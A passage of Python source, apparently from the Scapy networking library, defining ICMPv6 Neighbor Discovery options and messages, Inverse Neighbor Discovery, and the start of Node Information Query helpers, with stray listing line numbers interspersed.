# Neighbor Discovery option type -> human readable name.
icmp6ndopts = {
    1: "Source Link-Layer Address",
    2: "Target Link-Layer Address",
    3: "Prefix Information",
    4: "Redirected Header",
    5: "MTU",
    6: "NBMA Shortcut Limit Option",  # RFC2491
    7: "Advertisement Interval Option",
    8: "Home Agent Information Option",
    9: "Source Address List",
    10: "Target Address List",
    11: "CGA Option",  # RFC 3971
    12: "RSA Signature Option",  # RFC 3971
    13: "Timestamp Option",  # RFC 3971
    14: "Nonce option",  # RFC 3971
    15: "Trust Anchor Option",  # RFC 3971
    16: "Certificate Option",  # RFC 3971
    17: "IP Address Option",  # RFC 4068
    18: "New Router Prefix Information Option",  # RFC 4068
    19: "Link-layer Address Option",  # RFC 4068
    20: "Neighbor Advertisement Acknowledgement Option",
    21: "CARD Request Option",  # RFC 4065/4066/4067
    22: "CARD Reply Option",  # RFC 4065/4066/4067
    23: "MAP Option",  # RFC 4140
    24: "Route Information Option",  # RFC 4191
    25: "Recursive DNS Server Option",
    26: "IPv6 Router Advertisement Flags Option",
}

1759 

# Neighbor Discovery option type -> name of the class implementing it.
icmp6ndoptscls = {
    1: "ICMPv6NDOptSrcLLAddr",
    2: "ICMPv6NDOptDstLLAddr",
    3: "ICMPv6NDOptPrefixInfo",
    4: "ICMPv6NDOptRedirectedHdr",
    5: "ICMPv6NDOptMTU",
    6: "ICMPv6NDOptShortcutLimit",
    7: "ICMPv6NDOptAdvInterval",
    8: "ICMPv6NDOptHAInfo",
    9: "ICMPv6NDOptSrcAddrList",
    10: "ICMPv6NDOptTgtAddrList",
    # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py
    # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py
    # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py
    # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py
    # 15: Do Me,
    # 16: Do Me,
    17: "ICMPv6NDOptIPAddr",
    18: "ICMPv6NDOptNewRtrPrefix",
    19: "ICMPv6NDOptLLA",
    # 20: Do Me,
    # 21: Do Me,
    # 22: Do Me,
    23: "ICMPv6NDOptMAP",
    24: "ICMPv6NDOptRouteInfo",
    25: "ICMPv6NDOptRDNSS",
    26: "ICMPv6NDOptEFA",
    31: "ICMPv6NDOptDNSSL",
    37: "ICMPv6NDOptCaptivePortal",
    38: "ICMPv6NDOptPREF64",
}

1792 

# Router preference values (RFC 4191)
icmp6ndraprefs = {
    0: "Medium (default)",
    1: "High",
    2: "Reserved",
    3: "Low",
}

1797 

1798 

1799class _ICMPv6NDGuessPayload: 

1800 name = "Dummy ND class that implements guess_payload_class()" 

1801 

1802 def guess_payload_class(self, p): 

1803 if len(p) > 1: 

1804 return icmp6ndoptscls.get(orb(p[0]), ICMPv6NDOptUnknown) 

1805 

1806 

1807# Beginning of ICMPv6 Neighbor Discovery Options. 

1808 

class ICMPv6NDOptDataField(StrLenField):
    # String field whose machine form is zero-padded so that the data plus
    # two extra bytes is a multiple of 8 bytes long.
    __slots__ = ["strip_zeros"]

    def __init__(self, name, default, strip_zeros=False, **kwargs):
        super().__init__(name, default, **kwargs)
        # When set, trailing zero bytes are removed on dissection.
        self.strip_zeros = strip_zeros

    def i2len(self, pkt, x):
        # The length is the padded one.
        padded = self.i2m(pkt, x)
        return len(padded)

    def i2m(self, pkt, x):
        # Number of zero bytes needed to reach the next multiple of 8.
        missing = -(len(x) + 2) % 8
        if missing:
            x += b"\x00" * missing
        return x

    def m2i(self, pkt, x):
        return x.rstrip(b"\x00") if self.strip_zeros else x

1829 

1830 

class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
    name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
    fields_desc = [
        ByteField("type", 0),
        # Length in units of 8 bytes, "type" and "len" bytes included.
        FieldLenField(
            "len", None, length_of="data", fmt="B",
            adjust=lambda pkt, x: (2 + x) // 8,
        ),
        # A "len" of 0 is dissected as if it were 1.
        ICMPv6NDOptDataField(
            "data", "", strip_zeros=False,
            length_from=lambda pkt: 8 * max(pkt.len, 1) - 2,
        ),
    ]

1839 

1840# NOTE: len includes type and len field. Expressed in unit of 8 bytes 

# TODO: Revisit the ETHER_ANY handling

1842 

1843 

class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
    name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
    fields_desc = [
        ByteField("type", 1),
        ByteField("len", 1),
        SourceMACField("lladdr"),
    ]

    def mysummary(self):
        summary = self.sprintf("%name% %lladdr%")
        return summary

1852 

1853 

class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
    # Same layout as the source link-layer address option, with type 2.
    name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
    type = 2

1857 

1858 

class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
    name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
    fields_desc = [
        ByteField("type", 3),
        ByteField("len", 4),
        ByteField("prefixlen", 64),
        # One-bit flags followed by five reserved bits
        BitField("L", 1, 1),
        BitField("A", 1, 1),
        BitField("R", 0, 1),
        BitField("res1", 0, 5),
        XIntField("validlifetime", 0xffffffff),
        XIntField("preferredlifetime", 0xffffffff),
        XIntField("res2", 0x00000000),
        IP6Field("prefix", "::"),
    ]

    def mysummary(self):
        template = ("%name% %prefix%/%prefixlen% "
                    "On-link %L% Autonomous Address %A% "
                    "Router Address %R%")
        return self.sprintf(template)

1877 

1878# TODO: We should also limit the size of included packet to something 

1879# like (initiallen - 40 - 2) 

1880 

1881 

class TruncPktLenField(PacketLenField):
    # Packet field whose built bytes are truncated to a multiple of 8.

    def i2m(self, pkt, x):
        built = bytes(x)
        # Keep only whole 8-byte blocks.
        usable = len(built) - (len(built) % 8)
        return built[:usable]

    def i2len(self, pkt, i):
        # The length is the one of the truncated bytes.
        truncated = self.i2m(pkt, i)
        return len(truncated)

1890 

1891 

class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
    name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
    fields_desc = [
        ByteField("type", 4),
        # In units of 8 bytes: the 8 leading bytes (type, len, res) plus
        # the embedded packet.
        FieldLenField(
            "len", None, length_of="pkt", fmt="B",
            adjust=lambda pkt, x: (x + 8) // 8,
        ),
        MayEnd(StrFixedLenField("res", b"\x00" * 6, 6)),
        TruncPktLenField(
            "pkt", b"", IPv6,
            length_from=lambda pkt: 8 * pkt.len - 8,
        ),
    ]

1900 

1901# See which value should be used for default MTU instead of 1280 

1902 

1903 

# Neighbor Discovery "MTU" option (type 5); the mtu field defaults to 1280.
class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
    name = "ICMPv6 Neighbor Discovery Option - MTU"
    fields_desc = [ByteField("type", 5),
                   ByteField("len", 1),
                   XShortField("res", 0),
                   IntField("mtu", 1280)]

    def mysummary(self):
        # One-line summary: option name followed by the MTU value
        return self.sprintf("%name% %mtu%")

1913 

1914 

# Neighbor Discovery "NBMA Shortcut Limit" option (type 6).
class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet):  # RFC 2491
    name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
    fields_desc = [ByteField("type", 6),
                   ByteField("len", 1),
                   ByteField("shortcutlim", 40),  # XXX
                   ByteField("res1", 0),
                   IntField("res2", 0)]

1922 

1923 

# Neighbor Discovery "Advertisement Interval" option (type 7).
class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
    name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
    fields_desc = [ByteField("type", 7),
                   ByteField("len", 1),
                   ShortField("res", 0),
                   IntField("advint", 0)]

    def mysummary(self):
        # The summary labels advint as a value in milliseconds
        return self.sprintf("%name% %advint% milliseconds")

1933 

1934 

# Neighbor Discovery "Home Agent Information" option (type 8).
class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
    name = "ICMPv6 Neighbor Discovery - Home Agent Information"
    fields_desc = [ByteField("type", 8),
                   ByteField("len", 1),
                   ShortField("res", 0),
                   ShortField("pref", 0),
                   ShortField("lifetime", 1)]

    def mysummary(self):
        # Summary shows the preference, then the lifetime labelled in seconds
        return self.sprintf("%name% %pref% %lifetime% seconds")

1945 

1946# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support 

1947 

1948# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support 

1949 

1950 

# Neighbor Discovery "IP Address" option (type 17); optcode selects which
# address the option carries.
class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
    fields_desc = [ByteField("type", 17),
                   ByteField("len", 3),
                   ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
                                                2: "New Care-Of Address",
                                                3: "NAR's IP address"}),
                   ByteField("plen", 64),
                   IntField("res", 0),
                   IP6Field("addr", "::")]

1961 

1962 

# Neighbor Discovery "New Router Prefix Information" option (type 18).
class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)"  # noqa: E501
    fields_desc = [ByteField("type", 18),
                   ByteField("len", 3),
                   ByteField("optcode", 0),
                   ByteField("plen", 64),
                   IntField("res", 0),
                   IP6Field("prefix", "::")]

1971 

1972 

# Display names for the "optcode" byte of the RFC 4068 Link-Layer Address
# option (used by ICMPv6NDOptLLA).
# NOTE(review): "preifx" in entry 6 looks like a typo for "prefix"; it is
# left unchanged here because the string is visible at runtime.
_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
                        1: "LLA for the new AP",
                        2: "LLA of the MN",
                        3: "LLA of the NAR",
                        4: "LLA of the src of TrSolPr or PrRtAdv msg",
                        5: "AP identified by LLA belongs to current iface of router",  # noqa: E501
                        6: "No preifx info available for AP identified by the LLA",  # noqa: E501
                        7: "No fast handovers support for AP identified by the LLA"}  # noqa: E501

1981 

1982 

# Neighbor Discovery "Link-Layer Address (LLA)" option (type 19).
class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)"  # noqa: E501
    fields_desc = [ByteField("type", 19),
                   ByteField("len", 1),
                   ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
                   MACField("lla", ETHER_ANY)]  # We only support ethernet

1989 

1990 

# Neighbor Discovery "MAP" option (type 23).
class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet):  # RFC 4140
    name = "ICMPv6 Neighbor Discovery - MAP Option"
    fields_desc = [ByteField("type", 23),
                   ByteField("len", 3),
                   # dist, pref, R and res together span 16 bits (4+4+1+7)
                   BitField("dist", 1, 4),
                   BitField("pref", 15, 4),  # highest availability
                   BitField("R", 1, 1),
                   BitField("res", 0, 7),
                   IntField("validlifetime", 0xffffffff),
                   IP6Field("addr", "::")]

2001 

2002 

class _IP6PrefixField(IP6Field):
    """IPv6 prefix field whose on-wire size is driven by the packet's ``len``.

    ``len`` is read in units of 8 bytes; the prefix occupies
    ``8 * (len - 1)`` bytes when dissecting.
    """
    __slots__ = ["length_from"]

    def __init__(self, name, default):
        IP6Field.__init__(self, name, default)
        self.length_from = lambda pkt: 8 * (pkt.len - 1)

    def addfield(self, pkt, s, val):
        """Append the (possibly shortened or padded) prefix bytes to ``s``."""
        encoded = self.i2m(pkt, val)
        return s + encoded

    def getfield(self, pkt, s):
        """Consume the prefix bytes and zero-fill them up to 16 before decoding."""
        nbytes = self.length_from(pkt)
        head, rest = s[:nbytes], s[nbytes:]
        if nbytes < 16:
            head += b'\x00' * (16 - nbytes)
        return rest, self.m2i(pkt, head)

    def i2len(self, pkt, x):
        """Return the number of bytes ``x`` occupies once built."""
        return len(self.i2m(pkt, x))

    def i2m(self, pkt, x):
        """Build the prefix bytes according to ``pkt.len``.

        * ``len`` None with an explicit prefix: the full 16 bytes;
        * ``len`` 0 or 1: nothing;
        * ``len`` 2 or 3: the first 8 or 16 bytes;
        * larger ``len``: 16 bytes followed by zero padding.
        """
        units = pkt.len

        if x is None:
            # No prefix given: use "::" and, if len is unset too, act as len 1
            x = "::"
            if units is None:
                units = 1
        packed = inet_pton(socket.AF_INET6, x)

        if units is None:
            return packed
        if units in (0, 1):
            return b""
        if units in (2, 3):
            return packed[:8 * (units - 1)]

        return packed + b'\x00' * 8 * (units - 3)

2040 

2041 

# Neighbor Discovery "Route Information" option (type 24).
class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet):  # RFC 4191
    name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
    fields_desc = [ByteField("type", 24),
                   # When left to None, len is derived from the size of
                   # "prefix": size // 8 + 1
                   FieldLenField("len", None, length_of="prefix", fmt="B",
                                 adjust=lambda pkt, x: x // 8 + 1),
                   ByteField("plen", None),
                   # res1, prf and res2 together span 8 bits (3 + 2 + 3)
                   BitField("res1", 0, 3),
                   BitEnumField("prf", 0, 2, icmp6ndraprefs),
                   BitField("res2", 0, 3),
                   IntField("rtlifetime", 0xffffffff),
                   _IP6PrefixField("prefix", None)]

    def mysummary(self):
        # Summary shows prefix/plen followed by the route preference
        return self.sprintf("%name% %prefix%/%plen% Preference %prf%")

2056 

2057 

# Neighbor Discovery "Recursive DNS Server" option (type 25).
class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet):  # RFC 5006
    name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
    fields_desc = [ByteField("type", 25),
                   # When left to None, len is derived from the number of
                   # entries in "dns": 2 * count + 1
                   FieldLenField("len", None, count_of="dns", fmt="B",
                                 adjust=lambda pkt, x: 2 * x + 1),
                   ShortField("res", None),
                   IntField("lifetime", 0xffffffff),
                   # On dissection the list spans 8 * (len - 1) bytes
                   IP6ListField("dns", [],
                                length_from=lambda pkt: 8 * (pkt.len - 1))]

    def mysummary(self):
        # Option name followed by the comma-separated server addresses
        return self.sprintf("%name% ") + ", ".join(self.dns)

2070 

2071 

# Neighbor Discovery "Expanded Flags" option (type 26): a single 48-bit
# "res" field follows the type and len bytes.
class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet):  # RFC 5175 (prev. 5075)
    name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
    fields_desc = [ByteField("type", 26),
                   ByteField("len", 1),
                   BitField("res", 0, 48)]

2077 

2078# As required in Sect 8. of RFC 3315, Domain Names must be encoded as 

2079# described in section 3.1 of RFC 1035 

2080# XXX Label should be at most 63 octets in length : we do not enforce it 

2081# Total length of domain should be 255 : we do not enforce it either 

2082 

2083 

class DomainNameListField(StrLenField):
    """List of domain names stored as length-prefixed labels.

    When ``padded`` is true, the built value is zero-padded up to a multiple
    of ``padded_unit`` bytes and empty names found while dissecting are
    treated as padding and skipped.
    """
    __slots__ = ["padded"]
    islist = 1
    padded_unit = 8

    def __init__(self, name, default, length_from=None, padded=False):  # noqa: E501
        self.padded = padded
        StrLenField.__init__(self, name, default, length_from=length_from)

    def i2len(self, pkt, x):
        """Return the size in bytes of the built value."""
        return len(self.i2m(pkt, x))

    def i2h(self, pkt, x):
        """Return the list of names, mapping any empty value to ``[]``."""
        return x if x else []

    def m2i(self, pkt, x):
        """Decode wire data into a list of dot-terminated names."""
        remaining = plain_str(x)  # Decode bytes to string
        names = []
        while remaining:
            # Collect the labels of one name, stopping at a \x00 length byte
            labels = []
            while remaining and ord(remaining[0]) != 0:
                size = ord(remaining[0])
                labels.append(remaining[1:size + 1])
                remaining = remaining[size + 1:]
            # In padded mode a name without labels is padding: skip it
            if labels or not self.padded:
                names.append(".".join(labels) + ".")
            # Step over the terminating \x00, if any
            if remaining and ord(remaining[0]) == 0:
                remaining = remaining[1:]
        return names

    def i2m(self, pkt, x):
        """Encode a list of names into length-prefixed labels.

        Note: each length byte is computed from the number of characters of
        the label before it is UTF-8 encoded.
        """
        encoded_names = []
        for name in x:
            wire = b"".join(chb(len(label)) + label.encode("utf8")
                            for label in name.split('.'))
            # Make sure every encoded name ends with a null byte
            if not (wire and orb(wire[-1]) == 0):
                wire = wire + b'\x00'
            encoded_names.append(wire)
        ret_string = b"".join(encoded_names)

        # In padded mode, fill up to the next multiple of padded_unit
        leftover = len(ret_string) % self.padded_unit
        if self.padded and leftover != 0:
            ret_string += b"\x00" * (self.padded_unit - leftover)

        return ret_string

2136 

2137 

# Neighbor Discovery "DNS Search List" option (type 31).
class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet):  # RFC 6106
    name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
    fields_desc = [ByteField("type", 31),
                   # When left to None, len is derived from the size of
                   # "searchlist": 1 + size // 8
                   FieldLenField("len", None, length_of="searchlist", fmt="B",
                                 adjust=lambda pkt, x: 1 + x // 8),
                   ShortField("res", None),
                   IntField("lifetime", 0xffffffff),
                   # On dissection the list spans 8 * len - 8 bytes; the
                   # field is used in its padded mode
                   DomainNameListField("searchlist", [],
                                       length_from=lambda pkt: 8 * pkt.len - 8,
                                       padded=True)
                   ]

    def mysummary(self):
        # Option name followed by the comma-separated search domains
        return self.sprintf("%name% ") + ", ".join(self.searchlist)

2152 

2153 

# Neighbor Discovery "Captive-Portal" option (type 37) carrying a URI.
class ICMPv6NDOptCaptivePortal(_ICMPv6NDGuessPayload, Packet):  # RFC 8910
    name = "ICMPv6 Neighbor Discovery Option - Captive-Portal Option"
    fields_desc = [ByteField("type", 37),
                   # When left to None, len is derived from the size of
                   # "URI": (2 + size) // 8
                   FieldLenField("len", None, length_of="URI", fmt="B",
                                 adjust=lambda pkt, x: (2 + x) // 8),
                   # len is clamped to at least 1 when computing the size
                   # to dissect, so the result is never negative
                   ICMPv6NDOptDataField("URI", "", strip_zeros=True,
                                        length_from=lambda pkt:
                                        8 * max(pkt.len, 1) - 2)]

    def mysummary(self):
        # One-line summary: option name followed by the URI
        return self.sprintf("%name% %URI%")

2165 

2166 

class _PREF64(IP6Field):
    """IPv6 field that only carries the first 12 bytes of the address."""

    def addfield(self, pkt, s, val):
        """Append the first 12 bytes of the built address to ``s``."""
        packed = self.i2m(pkt, val)
        return s + packed[:12]

    def getfield(self, pkt, s):
        """Consume 12 bytes and decode them completed with 4 zero bytes."""
        head, rest = s[:12], s[12:]
        return rest, self.m2i(pkt, head + b"\x00" * 4)

2173 

2174 

# Neighbor Discovery "PREF64" option (type 38).
class ICMPv6NDOptPREF64(_ICMPv6NDGuessPayload, Packet):  # RFC 8781
    name = "ICMPv6 Neighbor Discovery Option - PREF64 Option"
    fields_desc = [ByteField("type", 38),
                   ByteField("len", 2),
                   # scaledlifetime and plc together span 16 bits (13 + 3)
                   BitField("scaledlifetime", 0, 13),
                   # plc is an index into the list of prefix lengths below
                   BitEnumField("plc", 0, 3,
                                ["/96", "/64", "/56", "/48", "/40", "/32"]),
                   _PREF64("prefix", "::")]

    def mysummary(self):
        # Only plc values 0..5 have a name; anything else is shown as invalid
        plc = self.sprintf("%plc%") if self.plc < 6 else f"[invalid PLC({self.plc})]"
        return self.sprintf("%name% %prefix%") + plc

2187 

2188# End of ICMPv6 Neighbor Discovery Options. 

2189 

2190 

# ICMPv6 Router Solicitation message (type 133).
class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
    name = "ICMPv6 Neighbor Discovery - Router Solicitation"
    fields_desc = [ByteEnumField("type", 133, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   IntField("res", 0)]
    # Values applied to an underlying IPv6 layer: next header 58,
    # destination ff02::2 and hop limit 255
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}}

2198 

2199 

# ICMPv6 Router Advertisement message (type 134).
class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
    name = "ICMPv6 Neighbor Discovery - Router Advertisement"
    fields_desc = [ByteEnumField("type", 134, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   ByteField("chlim", 0),
                   # M, O, H, prf, P and res together span 8 bits
                   BitField("M", 0, 1),
                   BitField("O", 0, 1),
                   BitField("H", 0, 1),
                   BitEnumField("prf", 1, 2, icmp6ndraprefs),  # RFC 4191
                   BitField("P", 0, 1),
                   BitField("res", 0, 2),
                   ShortField("routerlifetime", 1800),
                   IntField("reachabletime", 0),
                   IntField("retranstimer", 0)]
    # Values applied to an underlying IPv6 layer: next header 58,
    # destination ff02::1 and hop limit 255
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def answers(self, other):
        # Any Router Solicitation is accepted as the matching request
        return isinstance(other, ICMPv6ND_RS)

    def mysummary(self):
        # Summary shows lifetime, hop limit, preference and the M/O/H flags
        return self.sprintf("%name% Lifetime %routerlifetime% "
                            "Hop Limit %chlim% Preference %prf% "
                            "Managed %M% Other %O% Home %H%")

2224 

2225 

# ICMPv6 Neighbor Solicitation message (type 135).
class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
    fields_desc = [ByteEnumField("type", 135, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   IntField("res", 0),
                   IP6Field("tgt", "::")]
    # Values applied to an underlying IPv6 layer: next header 58,
    # destination ff02::1 and hop limit 255
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def mysummary(self):
        # One-line summary: message name and target address
        return self.sprintf("%name% (tgt: %tgt%)")

    def hashret(self):
        # Hash on the target address, then on the payload's own hash
        return bytes_encode(self.tgt) + self.payload.hashret()

2240 

2241 

# ICMPv6 Neighbor Advertisement message (type 136).
class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
    fields_desc = [ByteEnumField("type", 136, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   # R, S, O and res together span 32 bits (1 + 1 + 1 + 29)
                   BitField("R", 1, 1),
                   BitField("S", 0, 1),
                   BitField("O", 1, 1),
                   XBitField("res", 0, 29),
                   IP6Field("tgt", "::")]
    # Values applied to an underlying IPv6 layer: next header 58,
    # destination ff02::1 and hop limit 255
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def mysummary(self):
        # One-line summary: message name and target address
        return self.sprintf("%name% (tgt: %tgt%)")

    def hashret(self):
        # Same hash as ICMPv6ND_NS: target address plus the payload's hash
        return bytes_encode(self.tgt) + self.payload.hashret()

    def answers(self, other):
        # Matches a Neighbor Solicitation sent for the same target address
        return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt

2262 

2263# associated possible options : target link-layer option, Redirected header 

2264 

2265 

# ICMPv6 Redirect message (type 137) with target and destination addresses.
class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    name = "ICMPv6 Neighbor Discovery - Redirect"
    fields_desc = [ByteEnumField("type", 137, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XIntField("res", 0),
                   IP6Field("tgt", "::"),
                   IP6Field("dst", "::")]
    # Values applied to an underlying IPv6 layer: next header 58,
    # destination ff02::1 and hop limit 255
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

2275 

2276 

2277# ICMPv6 Inverse Neighbor Discovery (RFC 3122) # 

2278 

# Inverse Neighbor Discovery "Source Address List" option (type 9).
class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
    name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
    fields_desc = [ByteField("type", 9),
                   # When left to None, len is derived from the number of
                   # entries in "addrlist": 2 * count + 1
                   FieldLenField("len", None, count_of="addrlist", fmt="B",
                                 adjust=lambda pkt, x: 2 * x + 1),
                   StrFixedLenField("res", b"\x00" * 6, 6),
                   # On dissection the list spans 8 * (len - 1) bytes
                   IP6ListField("addrlist", [],
                                length_from=lambda pkt: 8 * (pkt.len - 1))]

2287 

2288 

# Reuses the fields of ICMPv6NDOptSrcAddrList; only the display name and the
# class-level "type" value (10) differ.
class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
    name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
    type = 10

2292 

2293 

2294# RFC3122 

2295# Required options: source lladdr and target lladdr

2296# Other valid options: source address list, MTU

2297# - As stated in the document, it would be nice to take the L2 address

2298# requested in the required target lladdr option and use it as the

2299# Ethernet destination address when no address is specified

2300# - this is not necessarily convenient if the user has to specify all

2301# the options.

2302# Ether() must use the target lladdr as destination 

# ICMPv6 Inverse Neighbor Discovery Solicitation message (type 141).
class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
    name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
    fields_desc = [ByteEnumField("type", 141, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XIntField("reserved", 0)]
    # Values applied to an underlying IPv6 layer: next header 58,
    # destination ff02::1 and hop limit 255
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

2310 

2311# Required options: target lladdr, target address list

2312# Other valid options: MTU

2313 

2314 

# ICMPv6 Inverse Neighbor Discovery Advertisement message (type 142).
class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
    name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
    fields_desc = [ByteEnumField("type", 142, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XIntField("reserved", 0)]
    # Values applied to an underlying IPv6 layer: next header 58,
    # destination ff02::1 and hop limit 255
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

2322 

2323 

2324############################################################################### 

2325# ICMPv6 Node Information Queries (RFC 4620) 

2326############################################################################### 

2327 

2328# [ ] Add automatic destination address computation using computeNIGroupAddr 

2329# in IPv6 class (Scapy6 modification when integrated) if : 

2330# - it is not provided 

2331# - upper layer is ICMPv6NIQueryName() with a valid value 

2332# [ ] Try to be liberal in what we accept as internal values for _explicit_ 

2333# DNS elements provided by users. Any string should be considered 

2334# valid and kept like it has been provided. At the moment, i2repr() will 

2335# crash on many inputs 

2336# [ ] Do the documentation 

2337# [ ] Add regression tests 

2338# [ ] Perform test against real machines (NOOP reply is proof of implementation). # noqa: E501 

2339# [ ] Check if there are differences between different stacks. Among *BSD, 

2340# with others. 

2341# [ ] Deal with flags in a consistent way. 

2342# [ ] Implement compression in names2dnsrepr() and decompression in

2343# dnsrepr2names(). It should be possible to disable it.

2344 

# Display names for the "qtype" field of Node Information queries and
# replies. Value 1 has no entry.
icmp6_niqtypes = {0: "NOOP",
                  2: "Node Name",
                  3: "IPv6 Address",
                  4: "IPv4 Address"}

2349 

2350 

# Mixin providing hashret() for Node Information packets.
class _ICMPv6NIHashret:
    def hashret(self):
        # The hash is derived from the nonce only
        return bytes_encode(self.nonce)

2354 

2355 

# Mixin providing answers() for Node Information replies.
class _ICMPv6NIAnswers:
    def answers(self, other):
        # A packet answers another one when both carry the same nonce
        return self.nonce == other.nonce

2359 

2360# Buggy; always returns the same value during a session 

2361 

2362 

# Fixed-length (8 bytes) string field used for the Node Information nonce.
class NonceField(StrFixedLenField):
    def __init__(self, name, default=None):
        StrFixedLenField.__init__(self, name, default, 8)
        if default is None:
            # The default is produced once, when the field object is
            # created, by calling randval().
            # NOTE(review): presumably this is what the "Buggy" comment
            # preceding the class refers to - confirm what randval() returns.
            self.default = self.randval()

2368 

2369 

2370@conf.commands.register 

def computeNIGroupAddr(name):
    """Compute the NI group Address. Can take a FQDN as input parameter

    Only the first label of ``name`` is used, lower-cased. The label is
    prefixed with its length, hashed with MD5, and the first four bytes of
    the digest become the last 32 bits of the returned ``ff02::2:XXXX:XXXX``
    address.

    :param name: host name or FQDN (str)
    :return: the group address, as a string
    """
    name = name.lower().split(".")[0]
    record = chr(len(name)) + name
    digest = md5(record.encode("utf8")).digest()
    # Each byte must be rendered as exactly two hex digits: "%2x" pads with
    # a space, which produced an invalid address for bytes below 0x10.
    return "ff02::2:%02x%02x:%02x%02x" % struct.unpack("BBBB", digest[:4])

2379 

2380 

2381# Here is the deal. First, that protocol is a piece of shit. Then, we 

2382# provide 4 classes for the different kinds of Requests (one for every 

2383# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same 

2384# data field class that is made to be smart by guessing the specific 

2385# type of value provided : 

2386# 

2387# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0, 

2388# if not overridden by user 

2389# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2, 

2390# if not overridden 

2391# - Name in the other cases: code is set to 0, if not overridden by user 

2392# 

2393# Internal storage is not only the value, but a pair providing

2394# the type and the value (0 is IPv6@, 1 is Name or string, 2 is IPv4@)

2395# 

2396# Note : I merged getfield() and m2i(). m2i() should not be called 

2397# directly anyway. Same remark for addfield() and i2m() 

2398# 

2399# -- arno 

2400 

2401# "The type of information present in the Data field of a query is 

2402# declared by the ICMP Code, whereas the type of information in a 

2403# Reply is determined by the Qtype" 

2404 

def names2dnsrepr(x):
    """
    Encode one DNS name, or a list of DNS names, as length-prefixed labels.

    A bytes value that already ends with a null byte is assumed to be
    encoded and is returned unmodified. A name made of a single component
    is terminated by two null bytes instead of one. The result is a bytes
    object.
    !!! At the moment, compression is not implemented !!!
    """

    if isinstance(x, bytes):
        if x and x[-1:] == b'\x00':  # stupid heuristic
            return x
        x = [x]

    encoded = []
